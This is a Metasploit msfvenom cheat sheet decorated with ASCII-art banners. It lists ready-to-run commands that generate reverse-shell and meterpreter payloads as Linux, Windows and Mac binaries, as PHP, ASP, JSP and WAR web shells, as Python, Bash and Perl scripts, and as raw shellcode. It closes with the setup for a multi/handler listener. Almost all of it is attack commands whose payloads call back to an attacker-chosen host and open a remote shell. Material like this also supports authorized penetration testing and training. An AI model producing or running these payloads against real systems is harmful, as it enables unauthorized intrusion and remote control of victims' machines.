
 ███▄ ▄███▓  ██████   █████▒██▒   █▓▓█████  ███▄    █  ▒█████   ███▄ ▄███▓
▓██▒▀█▀ ██▒▒██    ▒ ▓██   ▒▓██░   █▒▓█   ▀  ██ ▀█   █ ▒██▒  ██▒▓██▒▀█▀ ██▒
▓██    ▓██░░ ▓██▄   ▒████ ░ ▓██  █▒░▒███   ▓██  ▀█ ██▒▒██░  ██▒▓██    ▓██░
▒██    ▒██   ▒   ██▒░▓█▒  ░  ▒██ █░░▒▓█  ▄ ▓██▒  ▐▌██▒▒██   ██░▒██    ▒██ 
▒██▒   ░██▒▒██████▒▒░▒█░      ▒▀█░  ░▒████▒▒██░   ▓██░░ ████▓▒░▒██▒   ░██▒
░ ▒░   ░  ░▒ ▒▓▒ ▒ ░ ▒ ░      ░ ▐░  ░░ ▒░ ░░ ▒░   ▒ ▒ ░ ▒░▒░▒░ ░ ▒░   ░  ░
░  ░      ░░ ░▒  ░ ░ ░        ░ ░░   ░ ░  ░░ ░░   ░ ▒░  ░ ▒ ▒░ ░  ░      ░
░      ░   ░  ░  ░   ░ ░        ░░     ░      ░   ░ ░ ░ ░ ░ ▒  ░      ░   
       ░         ░               ░     ░  ░         ░     ░ ░         ░   
                                ░                                         



 ___   _     _       __    ___   _     __  
| |_) \ \_/ | |\ |  / /\  | |_) \ \_/ ( (` 
|_|_)  |_|  |_| \| /_/--\ |_| \  |_|  _)_) 
==========================================

### Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

### Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

### Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


 _       ____  ___       ___    __    _     _     ___    __    ___   __  
\ \    /| |_  | |_)     | |_)  / /\  \ \_/ | |   / / \  / /\  | | \ ( (` 
 \_\/\/ |_|__ |_|_)     |_|   /_/--\  |_|  |_|__ \_\_/ /_/--\ |_|_/ _)_) 
========================================================================

### PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

### ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

### JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

### WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war



 __   __    ___   _   ___  _____  _   _      __        ___    __    _     _     ___    __    ___   __  
( (` / /`  | |_) | | | |_)  | |  | | | |\ | / /`_     | |_)  / /\  \ \_/ | |   / / \  / /\  | | \ ( (` 
_)_) \_\_, |_| \ |_| |_|    |_|  |_| |_| \| \_\_/     |_|   /_/--\  |_|  |_|__ \_\_/ /_/--\ |_|_/ _)_) 
======================================================================================================

### Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

### Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

### Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl



 __   _     ____  _     _     __    ___   ___   ____ 
( (` | |_| | |_  | |   | |   / /`  / / \ | | \ | |_  
_)_) |_| | |_|__ |_|__ |_|__ \_\_, \_\_/ |_|_/ |_|__ 
====================================================

### Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

### Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

### Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>



 _      __    _      ___   _     ____  ___   __  
| |_|  / /\  | |\ | | | \ | |   | |_  | |_) ( (` 
|_| | /_/--\ |_| \| |_|_/ |_|__ |_|__ |_| \ _)_) 
================================================

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
